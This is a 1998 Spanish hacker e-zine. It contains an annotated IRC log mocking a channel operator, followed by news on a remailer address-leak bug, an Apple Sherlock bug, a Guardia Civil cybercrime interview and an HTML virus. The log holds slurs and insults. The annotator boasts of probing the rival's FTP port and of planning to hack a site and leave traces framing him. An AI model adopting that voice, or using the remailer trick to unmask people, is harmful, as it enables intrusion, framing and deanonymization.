<sunn> jeje <sunn> pero pa win yep <sunn> guenop <sunn> na <sunn> thx ppl <sunn> :) <inf> una preg... <inf> q co±o hase #hackers con -s ┐? [ joder !!!! que fallo!!!! como si no se conociera el canal ... para ponerlo secreto!!! ] <MuErTe> er fake version mola <MuErTe> xD <MuErTe> tenes rason inf <MuErTe> xD <inf> otia <inf> #seguridad_informatica *** MuErTe sets mode: +s <MuErTe> sip <MuErTe> er mashine kanal der guy <MuErTe> xD <sunn> jeje <MuErTe> alli saprende munsho [ desde luego, mas que en este canal si que se aprende, aunque claro, tu de seguridad, ni puta idea ... tu solo hack ... e IRC!!! que no se me olvide ... ] <MuErTe> xD <sunn> x) <MuErTe> vaya.. <MuErTe> komo aki *** Atic has quit IRC (Ping timeout for Atic[ctv21225131172.ctv.es]) <MuErTe> xD <sunn> gueno ppl <sunn> iop xapo <MuErTe> eske inf <MuErTe> ayer y antes de ayer <MuErTe> no se el porke <sunn> noz vemoz <MuErTe> estaba -k tambien <MuErTe> byez sunn *** sunn has quit IRC (By3x 4ll) <inf> jurl <MuErTe> no se kien pollas lo toka [ no sabes quien pollas lo toca, o quien te toca la polla? ¿?¿?¿? ] <MuErTe> alomejor era un makrokonsejo der guy <MuErTe> vete a saber - entra - Atic (2HG@ctv21225131009.ctv.es4) *** MuErTe sets mode: +o Atic - entra - cheme (2~chmegochy@ctv2234.ctv.es4) - Clones -( cheme , EMF ctv2234.ctv.es ] <MuErTe> 7op copito *** MuErTe sets mode: +o cheme <MuErTe> xD <cheme> thz :) <inf> weno..., arguien sabe como le va al 'iruxete? <MuErTe> xDDD <MuErTe> pos yo me voin a ir yap [ que vas a aprender a escribir mejor? ... lo necesitas ... y de paso, cambiate de nick ... por cierto, tal y como pense, ese puerto 21 tiene algunos fallos de configuracion ... pero como tu no vas por #seguridad_informatica porque eso no es c00l ... sigue asi chaval ] <ufo> si tio <ufo> porlo que veo <ufo> ya no sigues el horario <ufo> XDDDDDDDD <MuErTe> xDD <MuErTe> si lo sigoo <MuErTe> xD <MuErTe> weno <MuErTe> en parte <MuErTe> pasa ke maniana no kurro por la ma±ana [ no abre el club? si es lunes ... ] <MuErTe> tengo ke ir ar medikor [ ahhh, claro!!! otra vez te dio el ataque ... te tengo dicho que tanto hackear no es bueno ... si es que ser 31337 es muy duro ... ] <ufo> XD <ufo> ya tan detectau la enfermedad? <ufo> XD <ufo> ya era hora <inf> [ MuErTe: ] diras al lokero <MuErTe> aunek tengu ke levantarme a las 7 <ufo> ya se notaba mazo <inf> [ MuErTe: ] q te pasa? <MuErTe> toin malito :( [ lo tuyo no tiene remedio ... eres gilipollas :) ] <MuErTe> xD <ufo> pos tendra pikores en la polla.....como siempre <MuErTe> ma±ana me lo diran *** Atic sets mode: +o NunotReeZ - ThE_RaY (2bbb@ctv21225131038.ctv.es4) *** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones) <ThE_RaY> hy! <MuErTe> me tienes ke haser 3 ekografias [ y ahora viene lo mas divertido ... ] *** ufo sets mode: -b *!*@ctv2234.ctv.es *** Atic sets mode: -b *!*@ctv2234.ctv.es - entra NunotReeZ (2~cyber10@ctv2234.ctv.es4) - Clones (cheme , EMF , NunotReeZ ) ctv2234.ctv.es 4[134] *** \W3nd|g0 sets mode: +b *!*@ctv2234.ctv.es *** Atic sets mode: +oo cheme EMF <MuErTe> lso ri±ones y la bufeta *** cheme was kicked by LoLo (Banned) *** EMF was kicked by LoLo (Banned) *** ufo sets mode: -b *!*@ctv2234.ctv.es *** Atic sets mode: +o NunotReeZ *** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones) - entra NunotReeZ (2~cyber10@ctv2234.ctv.es4) <inf> [ MuErTe: ] tas pre±ao ? *** ufo sets mode: -ooo inf Hackelin Atic *** ufo sets mode: -oooo q1234 MuErTe LoLo l0b0 *** ufo sets mode: -o \W3nd|g0 - entra EMF (2~emf@ctv2234.ctv.es4) - Clones (2 EMF ,2 NunotReeZ ) ctv2234.ctv.es 4[124] <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <NunotReeZ> kagondios <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <Atic> xD <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <inf> [ MuErTe: ] tas pre±ao ? <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa <NunotReeZ> panda lamers *** ufo sets mode: +oooo inf Hackelin EMF Atic - sale Atic (4HG@ctv21225131009.ctv.es2) *** ufo sets mode: +oooo NunotReeZ MuErTe LoLo l0b0 *** ufo sets mode: +oo ThE_RaY q1234 <EMF> X'''''''DDDDDDDDDDDDDDd <NunotReeZ> X) - entra Atic (2HG@ctv21225131009.ctv.es4) *** ufo sets mode: +o Atic *** EMF sets mode: +v \W3nd|g0 <MuErTe> ? <EMF> :P <NunotReeZ> Unable to connect to finger address <NunotReeZ> kagondios *** Atic sets mode: -oooo EMF Hackelin inf l0b0 *** Atic was kicked by ufo (Mass Deop Protection! (4 Deops in 0 second(s) of 10. (7th Sphere) [ Guaaaaaauu ] <NunotReeZ> X) <ufo> pxxxxxx <ufo> xapusero..... <NunotReeZ> muerte <\W3nd|g0> ese ufillo <\W3nd|g0> ya la esta liandu <\W3nd|g0> XDDDDDDDDDDDDDDD <EMF> ei, muerte - entra Atic (2HG@ctv21225131009.ctv.es4) <NunotReeZ> pheorl <NunotReeZ> X) <EMF> kel the_ray <Atic> xD <MuErTe> juer <EMF> se mete al team <MuErTe> ke rallada <MuErTe> xD *** CuasI sets mode: +o Atic <MuErTe> diosssssss <MuErTe> noooo <MuErTe> noooo <MuErTe> noooo <MuErTe> noooo <MuErTe> noooo <MuErTe> el gay del asidorrrr <ufo> yasta .puedes pasar <MuErTe> aki!! <ufo> NOOOOOOOOOOOOOO <MuErTe> noooooooooooooooo <ufo> NOOOOOOOOOOOOOO <AciD-KrS> muhahahaha <MuErTe> xD <ufo> UN GAYYYYYYYYYYYYYYYYYYY <ufo> UN GAYYYYYYYYYYYYYYYYYYY <AciD-KrS> Puto!! <ufo> UN GAYYYYYYYYYYYYYYYYYYY <ufo> UN GAYYYYYYYYYYYYYYYYYYY <ufo> UUAAUAAUAUAUAUAUAAUAUAUAUAAUA <inf> XDDDDDDDDD <ufo> EL MARINERITO LEREEEEEEEEE <ufo> EL MARINERITO LEREEEEEEEEE <ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH <ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH <ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH <AciD-KrS> bUFOn!!!! <ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH <inf> marike? <AciD-KrS> Kpull00! - entra \W3nd|g0 (2IRcap.3@195.235.64.574) <AciD-KrS> x┤D *** cheme sets mode: +o \W3nd|g0 <MuErTe> . <MuErTe> weno jentusa <MuErTe> ara si ke me voin <MuErTe> weno no <MuErTe> tengo ke hablar kon alguien <MuErTe> xD <\W3nd|g0> ? <MuErTe> lo siento Wendi.. <MuErTe> kontigo no :) <\W3nd|g0> mia k me habia esho la idea de k te ivas <\W3nd|g0> ia me has amargao la noshe <MuErTe> mauhauahauahuahaua <MuErTe> xD <\W3nd|g0> :o/ <\W3nd|g0> XDDDDDDDDDD <\W3nd|g0> esta te la guardo <\W3nd|g0> MUhahahAHAhAhahahaha <MuErTe> byezz all <MuErTe> menos al guy <MuErTe> xD <MuErTe> kes mu pheo <MuErTe> xD *** Atic has quit IRC (Ping timeout for Atic[ctv21225131009.ctv.es]) <MuErTe> @q1234 ] [IRcap.41@X.X.X.X <MuErTe> mm <MuErTe> akaso me intentabas hackear lamerazo? [ jejeje ... tu sigue insultado y diciendo tonterias que yo mientras hago 'algunas cosillas' por ahi ... Mmmm ese puerto 21 ... ] <\W3nd|g0> uish <MuErTe> 179 ? S 0:00 ftpd: X.X.X.X: anonymous/anon@ana\010on.com: IDLE <\W3nd|g0> ia hay gre±a <MuErTe> mmm <MuErTe> putos lamers!! [ si si ... pero yo ya tengo una cuenta mas para conectarme a Internet ... la reservare para hackear algun site y dejar tus huellas de redestb ... veremos quien es mas lamer ... ] <\W3nd|g0> :o) <MuErTe> yeske no los soporto kagondios! - entra Atic (2HG@ctv21225130161.ctv.es4) *** MuErTe sets mode: -o+b q1234 *!*?R?a?.?1@?9?.?6.?1.?9? *** You were kicked by MuErTe (Banned forever!!!) *** Attempting to rejoin... Session Close: Mon Nov 23 01:47:17 1998 [ que rapido me ha echado ... acaso tenia miedo? Uuuuuuuuh ... si en el fondo no es mas que un pedazo de mierda ... ] [ por cierto ... a ver si tienes cojones y nos quitas tambien la web a nosotros ... ] NOTA IMPORTANTE !!!!!! se supone que Mierda (digo, muerte) no leera este articulo porque el es 31337, al igual que algunos amigos suyos, pero hay otros que si lo haran y que frecuentan el IRC. Quiero que quede claro que yo no he provocado a nadie para que dijera nada en el canal. No me he hecho pasar por nadie para ver vuestra reaccion. Simplemente puse un trozo de log ... si os molesta leer vuestros propios comentarios, es como si os molestara miraros al espejo ... Y otra cosa. yo tengo grandes amigos en el IRC (Nobody, Homs, Lobo, wendigo, ufo, arusha, etc) y se que, afortunadamente, los gilipollas son una minoria, pero los hay ... y el que quiera que se de por aludido. REFLEXION: si leemos bien estos logs podemos llegar a la conclusion de que hay dos tipos de hackers, la 31337 y los lamers, que paso a describir a continuacion: 1) Un hacker 31337 es aquel que cumple las siguientes caracteristicas: - Aprende a escribir con 'k' en vez de 'c', 'z' en vez de 's' y sobre todo ... numeros que sustituyan las letras ... - Es op en algun canal de hack de IRC. - Tiene un nick original (CaseZero, MuErTe, SuperHacker, Cool, r00t) - Consigue banear entre 10 y 20 newbies diarios. (Los lamers, que describire a continuacion, valen 5 puntos). - Debe pertenecer a algun grupo organizado, por supuesto, con mas gente del canal (y que tambien sean op's) pero solo para hackear. Que se jodan los que no saben!!! nada de articulos (Mmmmm ... no sera que no tienen capacidad para escribir ninguno???) 2) Por el contrario, un indeseado lamer es aquel que: - Solo entra en el IRC para chatear con los amigos (Arggggg ... que aburrido ... solo chatean ... ni banean a nadie ni se pasan cuentas shell ...) - Escribe articulos para alguna ezine (que lamer!!! ayudando a los newbies!!! es que no sabe que donde realmente se aprende es en IRC? ademas, a los newbies no hay que enseñarles ... hay que banearles!!) - Hackea sus propias cuentas shell ... (eyy!!! para que??? si mi amigo _Fet1d0_ me las pasa por IRC!!! para que voy a molestarme en conseguirlas yo mismo? asi solo tengo que entrar cargado con exploits (todos los que pille por ahi ..) y probar a ver si me hago r00t). Bueno, parece que esta claro, no? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ N o t i c i a s ]────────────────────────────────────────────────────────── *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- BUG EN REMAILERS Hace unas semanas Senpai descubrio un bug en el remailer de iname (www.iname.com) en el que cualquier usuario puede descubrir la direccion del forward a la que se redirigen los mails de un usuario. Para ello el servidor a donde va redirigido el correo ha de estar 'down' o saturado. Si enviamos un mail a HackerMan@iname.com (o cualquier otro dominio de iname), y el mail debe redirigirse a federico@arrakis.es, si el servidor de arrakis se encontrara inoperativo al recibir el mail, iname nos devolveria un mensaje como que no encontro el destino (al igual que hacen todos los servidores de correo) pero con un pequeño fallo. En el mail nos vendria: 'No se encontro la direccion federico@arrakis.es' Con lo que ya sabriamos cual es el proveedor de ese usuario. Una semana despues, PaTa descubrio el mismo bug en Bigfoot. Y como buenos usuarios de iname y bigfoot que somos, ya hemos advertido a los administradores para que subsanen estos problemas. Segun ellos lo estan tratando. De todas maneras os explico como podeis 'protegeros' si usais estos remailers: 1) Si teneis un buzon anonimo (hotmail, axis, latinmail, etc) no hay problema. Basta con que cambieis de buzon con algo de frecuencia. Pero tener en cuenta que estos servidores gratuitos son los que mas suelen fallar, o sea que tener cuidado e ir cambiando de buzon con frecuencia. 2) Si los mails se redirigen a los buzones que os han asignado vuestros proveedores, esta claro que no quereis que nadie sepa si po canectais a traves de arrakis, redesTB, o lo que sea. Bien, pues usar dos remailers. Por ejemplo: iname -> bigfoot -> arrakis Eso es todo. Os informaremos cuando tengamos mas noticias. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- APPLE CONFIRMA EL BUG SHERLOCK EN MAC OS 8.5 Este bug en el sistema de busqueda del sistema operativo mas reciente de los Mac (del que informamos en el boletin anterior) acaba de ser reconocido por Apple: http://www.news.com/News/Item/0%2C4%2C28189%2C00.html?dd.ne.tx.fs4.1102 La empresa no se ha pronunciado aun sobre las denuncias efectuadas por algunos usuarios acerca de otros posibles bugs que provocarian perdida de datos. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- (Articulo editado por el diario 'El Mundo') TENIENTE ANSELMO DEL MORAL, JEFE DEL GRUPO DE DELITOS INFORMATICOS DE LA GUARDIA CIVIL "Los hackers son un poco autistas" El Teniente Anselmo del Moral dirige el brazo armado de la Benemerita en la Red. Afable y extrovertido, ha cambiado la pistola por un modem y no lleva tricornio cuando se sienta a navegar por Internet. Del Moral piensa que la Red es un lugar que se puede utilizar para todo tipo de actividades: "Nosotros solo estamos para investigar las delictivas". OLALLA CERNUDA / PEDRO DE ALZAGA DIARIO DEL NAVEGANTE.- Como y por que se decide crear la Unidad de Delitos Informaticos? TENIENTE DEL MORAL.- En 1990 se forma la Unidad Central Operativa de Policia Judicial de la Guardia Civil, compuesta por diferentes grupos de investigacion muy especializados, que llevan a cabo una labor de apoyo al resto de las unidades de la Guardia Civil en casos especeficos, como robo de obras de arte, delincuencia organizada, delincuencia economica, etc. En 1996 surge la necesidad de prestar tambien apoyo en la investigacion de delitos informaticos o de alta tecnologia. Sobre todo porque en el Codigo Penal de 1995 aparecen delitos que pueden considerarse informaticos, bien por los medios utilizados para su comision o por el objeto del delito en si. Por aquel entonces yo pertenecia a un grupo encargado de investigar delitos violentos y homicidios y habia cursado estudios de analisis de gestion en informatica. Mis superiores me requirieron para formar el nuevo grupo de investigacion. Hice una seleccion de personal y escogi a tres hombres para la nueva unidad. El siguiente paso fue el de formarnos en este nuevo campo y establecer una metodologia de trabajo. Asistimos a diversos cursos, como el que organizo el FBI en Nueva York, que nos permitieron conocer como se estaba luchando contra este tipo de delincuencia en otros paises. DIARIO DEL NAVEGANTE.- Y cuando empiezan a trabajar? TENIENTE DEL MORAL.- Finalizado el periodo de formacion, se creo oficialmente el Grupo de Delincuencia Informatica y nuestro primer servicio fue la Operacion Toco, en marzo de 1997. Se trataba de la entrada ilegal en un servidor de la Universidad de Tarragona. A partir de entonces, empiezan a recibirse denuncias y casos sobre los que empezar a trabajar. Actualmente, tenemos muchos casos abiertos e, incluso empezamos a estar desbordados. Ademas, estamos estudiando el cambio de denominacion a Grupo de Investigacion de Delitos de Alta Tecnologia, pues ya no solo se presentan delitos informaticos, sino casos de fraude en las telecomunicaciones - falsificacian de tarjetas GSM -, microprocesadores remarcados, etc. Fraude en las telecomunicaciones o fraude electronico - compras realizadas a traves de Internet -. DIARIO DEL NAVEGANTE.- Han recibido algun tipo de formacion especializada? TENIENTE DEL MORAL.- Los miembros del Grupo ya contabamos con formacion procesal y penal -somos miembros de la Policia Judicial-, pero estaba claro que necesitariamos preparacion tecnica. Nos pusimos en contacto con las universidades de Tarragona y Politecnica de Cataluñ a y se organizaron cursos para que los miembros del Grupo recibieran formacion intensiva en comunicaciones, Linux, analisis de logs, medios de almacenamiento masivo, encriptacion, entre otras muchas cosas y de acuerdo a las denuncias que se nos iban presentando. DIARIO DEL NAVEGANTE.- Que tipo de denuncias recibe el Grupo? TENIENTE DEL MORAL.- Normalmente se trata de delitos recogidos en el Codigo Penal que se refieren a la revelacion de secretos o acceso no autorizado a sistemas informaticos, a daños a sistemas informaticos y a la copia ilegal de programas o a falsificacion de componentes. Incluso el envio masivo de correo electronico -lo que se conoce como SPAM- puede considerarse un uso no autorizado de las telecomunicaciones. En cualquier caso, intentamos trabajar desde un punto de vista pragmatico, policial, y no entramos a valorar la novedad o antiguedad del delito, lo unico que sabemos es que en todos ellos existe una dificultad tecnica y sobre ella trabajamos. DIARIO DEL NAVEGANTE.- Quienes son los principales denunciantes en España? TENIENTE DEL MORAL.- Eso depende del tipo de delito. En los casos que nosotros hemos estudiado mas en profundidad -sobre todo los de entrada ilegal en un sistema o "hacking"- los principales denunciantes han sido proveedores de Internet y Universidades. Tambien tenemos conocimiento de accesos no autorizados a instituciones del pais e incluso a entidades bancarias, pero estos casos no han sido denunciados. Lo sabemos por la confesion de alguno de los "hackers" detenidos, que han declarado saber entrar en estos sistemas. DIARIO DEL NAVEGANTE.- Y el Grupo puede actuar sin que haya una denuncia de alguna persona afectada? TENIENTE DEL MORAL.- Si, se puede actuar cuando el delito afecta a una pluralidad de personas, como indica el Codigo Penal. Cuando hay muchas personas afectadas no hace falta una denuncia para poder actuar, como, por ejemplo, el caso de un banco aleman al que este verano robaron las claves de sus clientes y les chantajearon con hacerlas publicas. Aunque el banco no denuncio el caso por temor al desprestigio la policia actuo por que afectaba a un colectivo muy grande. En España sucederia lo mismo. DIARIO DEL NAVEGANTE.- Nos podria contar algun caso de los que han resulelto favorablemente? TENIENTE DEL MORAL.- Uno de los casos de coordinacion entre comunidades autonomas fue en Sevilla. Un proveedor de Internet estaba boicoteando, mediante ordenadores, a un competidor, para quitarle su clientela. El proveedor contrato a un joven que sabia manejar un programa denominado "tear drop", capaz de lanzar paquetes cada diez minutos a una determinada direccion y, por tanto, dificultando el funcionamiento de un sistema. Ademas, el programador habia disfrazado la direccion de origen de los paquetes, sustituyendola por una perteneciente a la red del proveedor atacado. Para este, el ataque provenia de su propio sistema. Al mismo tiempo que el programa atacaba, en los momentos de mayor conexion, el gerente de la empresa atacante llevaba a cabo una captacion de los clientes de su competidor, que, logicamente, estaban descontentos con el servicio. Este caso pudimos resolverlo por la vanidad del programador. Se considero tan bueno que lo fue contando a muchas personas. Nosotros recogimos esas manifestaciones hasta conseguir el permiso para registrar su casa y alli descubrimos el programa "tear drop" en sus ordenadores. DIARIO DEL NAVEGANTE.- La BSA ha presentado denuncias? TENIENTE DEL MORAL.- La BSA ha trabajado con nosotros en casos de copia ilegal de programas. Ahora mismo recuerdo una operacion en Sevilla en la que se intervinieron 9.800 CD. Pero estos son servicios que no requieren una gran preparacion tecnica y cualquier unidad de la Guardia Civil podria llevarlos a cabo. El GDI suele actuar cuando hay una organizacion, un montante economico elevado, varias comunidades autonomas implicadas o es necesario coordinar acciones con el extranjero. En otros casos, nuestra labor se reduce a dirigir la informacion a nuestras unidades territoriales. DIARIO DEL NAVEGANTE.- Han recibido denuncias de bombardeo de correo? TENIENTE DEL MORAL.- Si, pero todavia ninguna se ha formalizado. Mucha gente nos ha contado que desde una cuenta de correo se les han enviado miles de mensajes de correo electronico. Lo que dice el Codigo Penal al respecto es que tiene que haber un perjuicio, pero cuando el denunciante se pone a valorarlo no lo hace en cuanto a las horas que tarda un tecnico en arreglarlo, o el coste que ha supuesto a la empresa tener el sistema apagado. Todo esto tiene que superar las 50.000 pesetas para que se considere delito. DIARIO DEL NAVEGANTE.- Que validez tiene un "log" como prueba? TENIENTE DEL MORAL.- En el Codigo Penal de 1995 no hay jurisprudencia sobre el uso de logs. La mayoria de los casos en los que se ha aportado un log como prueba estan todavia a la espera de juicio. Asi que, para ser justos, no sabemos la validez puedan tener. Cuando vamos a, pongamos por caso, un proveedor, el nos entrega una copia impresa del log, que nosotros cotejamos con lo registrado en la maquina. Es cierto que los log pueden ser objeto de manipulacion, pero hasta el momento no hemos encontrado ningun caso de denuncia falsa. Nosotros sabemos analizar un log e interpretarlo, pero, ademas, siempre contamos con la ayuda de expertos. El procedimiento habitual consiste en enviar el log al centro de Coordinacion de Emergencias de Redes Telematicas (CERT), un centro publico de reconocido prestigio nacional e internacional. Ellos nos remiten informes tecnicos que recogen lo que se ha detectado y se adjuntan a las diligencias. El criterio del CERT nos da la seguridad de no equivocarnos en cuanto a las conclusiones que hemos extraido. Por su parte, los jueces estan aceptando estos informes como pruebas documentales, una evidencia documental de lo que ha pasado. El hecho de que durante el proceso se demuestre que el log ha sido manipulado provocaria una situacion parecida a la de otros tantos juicios en los que se alega falsedad documental o de cualquier otro tipo de actividad. En el caso de delincuencia economica, cuando alguien denuncia una estafa y presenta un papel, una factura o un recibo, en definitiva esta presentando un objeto que tambien es manipulable. Pero, al final, la manipulacion es un delito y si se descubre, el perjudicado sera el. Repito que, hasta el momento, lo que se ha detectado corresponde exactamente con lo denunciado. Esto no quiere decir que en el futuro no nos intenten engañar, pero el filtro que hacemos es una verificacion por nuestra parte y por la de expertos. DIARIO DEL NAVEGANTE.- Como es el perfil del delincuente informatico español? TENIENTE DEL MORAL.- Segun los casos que hemos llevado, podriamos clasificar a los delincuentes informaticos en tres grupos. El primero, el grupo de los "hackers", estaria compuesto por jovenes varones, de entre 17 y 30 años, con gran capacidad y conocimientos tecnicos. Gente que en su mundo son verdaderos genios - su trabajo nos ha impresionado en muchas ocasiones-, pero a veces un poco "autistas", si se me permite la expresion. Frecuentan universidades o cibercafes, utilizan el IRC como medio para intercambiar conocimientos y forman grupos. A nosotros nos ha impresionado lo organizados que pueden llegar a ser -tienen sus propias reglas, sus sistemas de encriptacion-. Si esas reglas y metodos de trabajo se extrapolasen a otros grupos de delincuencia seria un verdadero problema. La mayor parte de ellos cometen los delitos como un reto intelectual, pero el resto sabe perfectamente que lo que esta haciendo es delictivo. Esta minoria suele actuar como lider y hay una gran mayoria que se siente atraida por ellos. Los casos que hasta ahora hemos tenido en España quiza no son de una gravedad maxima, pero el conocimiento tecnico de estas personas podria llegar a ser peligroso. Por poner un ejemplo, nosotros hemos detectado casos de intrusion en el sistema informatico del aeropuerto. El segundo grupo lo formarian las redes de delincuencia organizada, distribucion a traves de Internet o grupos de copia ilegal de programas, que suelen estar compuestos por personas que trabajan en tiendas de informatica. Lo verdaderamente curioso es que hay gente que puede vivir exclusivamente de esto, pues hemos detectado algun caso en el que las ganancias llegaban a ser de un millon de pesetas diario. Son gente mas mayor y su labor no requiere conocimientos tecnicos elevados. El tercer grupo, referido al fraude en equipos y componentes, esta compuesto por grandes empresas en Españ a -cuatro o cinco- que se dedican a importar del sudeste asiatico - Hong Kong, Vietnam, Taiwan- y de EEUU- Miami- mediante barcos e, incluso, aviones, microprocesadores remarcados para posteriormente distribuirlos en unas 200 empresas del territorio nacional. Estas compañias venden ordenadores clonicos muy baratos y saben perfectamente que los microprocesadores que estan vendiendo son falsos, remarcados. Al final, el defraudado es el consumidor de la calle, el ciudadano. En este grupo hemos encontrado empresas que empezaron hace cinco años con un capital de 5 millones de pesetas y, hoy en dia, facturan 1.200 millones. DIARIO DEL NAVEGANTE.- Como se puede actuar contra delitos fuera de nuestras fronteras? TENIENTE DEL MORAL.- Nosotros asistimos a muchas conferencias internacionales y estamos en contacto con las policias de otro paises, de Estados Unidos, Alemania, Inglaterra, etc. Desde nuestra fundacion hemos sido invitados a participar en foros internacionales. El primero de ellos fue en Nueva York, en el que nos invitaron a participar en la reunion que se celebra en la secretaria general de Interpol, en Lyon (Francia). De alli salio un grupo de trabajo de expertos policiales de ocho paises, entre ellos el nuestro, que nos reunimos cada tres meses, para exponer nuestros casos, los modus operandi, etc. Hemos podido comprobar que los delitos y las formas de actuacion practicamente coinciden en todos los paises: el remarcado de microprocesadores, el hacking, etc. De esta cooperacion han salido procedimientos conjuntos para que nos podamos comunicar los datos de los logs rapidamente y podamos identificar a una persona, aunque utilice otro pais como puente para atacar un sistema. Tambien estamos involucrados en otros proyectos, como el desarrollo de cursos de Interpol, en los que participamos como ponentes, para paises del este de Europa. Ademas, tenemos buenos contactos con casi todas las policias del mundo, y colaboramos en estos temas. Y no solo pertenecemos a la Interpol, sino que estamos en contacto con otras organizaciones internacionales, como la IOCE (International Organization of Computer Evidence), formada por empresas especializadas en el sector de la informatica y que pueden ayudarnos a conocer y reconocer evidencias en ordenadores. Hay empresas que venden programas para "reventar" ficheros encriptados o para interceptar correo electronico. En estos congresos, coincidimos con estas empresas y con gente del mundo de la lucha contra la delincuencia informatica, y agencias de inteligencia, como la CIA o el Mossad. Otra reunion a la que vamos con frecuencia es la de laboratorios forenses, para que podamos utilizar los distintos laboratorios de Europa por si necesitamos su colaboracion o ellos la nuestra. El resultado es que ahora mismo estamos trabajando en casos con el FBI, Scotland Yard, la policia sueca... Porque es muy habitual que se realicen conexiones intermedias desde maquinas de otros paises poco protegidos que se utilizan como puente para atacar en España. Las pruebas deben incorporarse al procedimiento español pero pidiendo comisiones rogatorias a otros paises. Cuando todo se produce en España es relativamente rapido dar con los delincuentes, solo hay que seguir la pista hacia atras de las conexiones. Pero cuando hay un pais intermedio, como en el caso de Hispahack, que operaba desde Gibraltar, el proceso es mucho mas lento. Debido a los problemas burocraticos, las extradiciones de personas que han cometido delitos en otros paises son muy lentas. DIARIO DEL NAVEGANTE.- Donde termina la libertad de expresion y comienza el delito? TENIENTE DEL MORAL.- Nosotros actuamos siempre de acuerdo al Codigo Penal, y tras la denuncia de una persona afectada. En el Codigo se define claramente el delito de apologia, y si encontramos una pagina web que segun al ley esta realizando apologia, podriamos actuar. Pero hasta ahora no hemos encontrado en Internet grupos de este tipo, o, mejor dicho, si los hemos encontrado, pero en otros paises. DIARIO DEL NAVEGANTE.- Que hay de cierto en lo que se cuenta sobre la pornografia infantil en la Red? TENIENTE DEL MORAL.- En España este tema no esta regulado como en otros paises. Aqui se considera delito la difusion de imagenes pornograficas entre menores de edad, pero en Internet no se puede saber cuantos menores de edad estan viendo una fotografia de este tipo. Lo que si es delito es someter a un menor a practicas pornograficas. Si nosotros a traves de las fotos llegamos al lugar donde se han realizado y a la persona que lo hace, se le detiene. Pero que haya proveedores de Internet que se dedican a coger fotos de la Red y colocarlas en sus paginas no es delito. En otros paises la difusion de este tipo de imagenes esta regulada, pero ademas tienen gente constantemente oteando la Red en busca de estas fotos. Eso es un trabajo impresionante de tiempo y trabajo. Pero nosotros, por la legislacion que hay en España, aunque lo encontrasemos no podriamos hacer nada. DIARIO DEL NAVEGANTE.- El comercio electronico en España es seguro? TENIENTE DEL MORAL.- El comercio electronico en bancos y grandes instituciones es muy seguro. Todos ellos estan utilizando protocolos de seguridad muy fiables, sistemas criptograficos para las transacciones economicas. Desde ese punto de vista si podemos afirmar que el comercio electronico es seguro. Ahora bien, estamos recibiendo muchas denuncias de empresas que montan una cibertienda y solo piden a sus clientes los datos de la VISA y la fecha de caducidad de la misma. No saben que en Internet pueden encontrarse programas capaces de generar numeros de VISA y sus respectivas fechas de caducidad y utilizarlos despues fraudulentamente. Estamos recibiendo un aluvion de denuncias por parte de esas pequeñas empresas. DIARIO DEL NAVEGANTE.- Como les afectara el uso de la criptografia privada, la particular? TENIENTE DEL MORAL.- En Internet hay una serie de riesgos y una serie de oportunidades. En cuanto a la legislacion, hay paises muy prohibitivos, como Francia, donde esta prohibido el envio de mensajes de forma encriptada, y solo se permite un cierto grado de encriptacion pero tiene que ser declarado a una especie de agencia de proteccion de datos. Los americanos tambien tienen algo parecido. En otros paises el desarrollo y uso de la encriptacion es libre o no esta regulado, como ocurre en España. Y en cuanto a riesgos de la encriptacion, el uso por parte de delincuentes ya ocurre en España. Se han utilizado comunicaciones encriptadas por parte de grupos organizados. Pero tambien esto tiene muchas utilidades, sobre todo para el comercio electronico, ya que su futuro pasa por la encriptacion. DIARIO DEL NAVEGANTE.- Que le parecen las movilizaciones que se estan llevando a cabo en España para que se implante la tarifa plana? TENIENTE DEL MORAL.- Ante esto nos mantenemos al margen, porque nosotros entramos a la Red a trabajar, no podemos ocuparnos de otras cosas. Cada pais tiene su problematica y sus historias. Es cierto que parece que en España las tarifas son algo mas caras que en Europa, pero tambien es cierto que aqui hay muchisimos mas proveedores que en otros paises. Nosotros nos mantenemos al margen porque no creo que tengamos que decir nada sobre esto. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- NUEVO VIRUS DE WEB Se acaba de anunciar el descubrimiento de un nuevo virus basado en web que puede entrar en los ordenadores de los usuarios simplemente visitando una pagina web. El virus, denominado HTML.Internal por el distribuidor de antivirus que lo descubrio, no produce ningun dano, pero segun la empresa podria ocasionar algun problema. El peligro lo tienen principalmente los usuarios de Explorer e Internet Information Server, de Microsoft. Si se esta usando Netscape u otro navegador, no hay ningun peligro. La forma de contagio es visitando una pagina web con el virus en el servidor, el cual hace una llamada al lenguaje de scripts de Visual Basic para realizar una busqueda en los discos duros locales de archivos con extensiones .HTM o .HTML. Al cargar una pagina infectada, el mensaje superior es "HTML.Prepend /1nternal." La forma de evitar el contagio es manteniendo la seguridad de Internet Explorer al menos en nivel Medio, ya que avisara a los usuarios que HTML.Internal esta buscando en los discos duros. 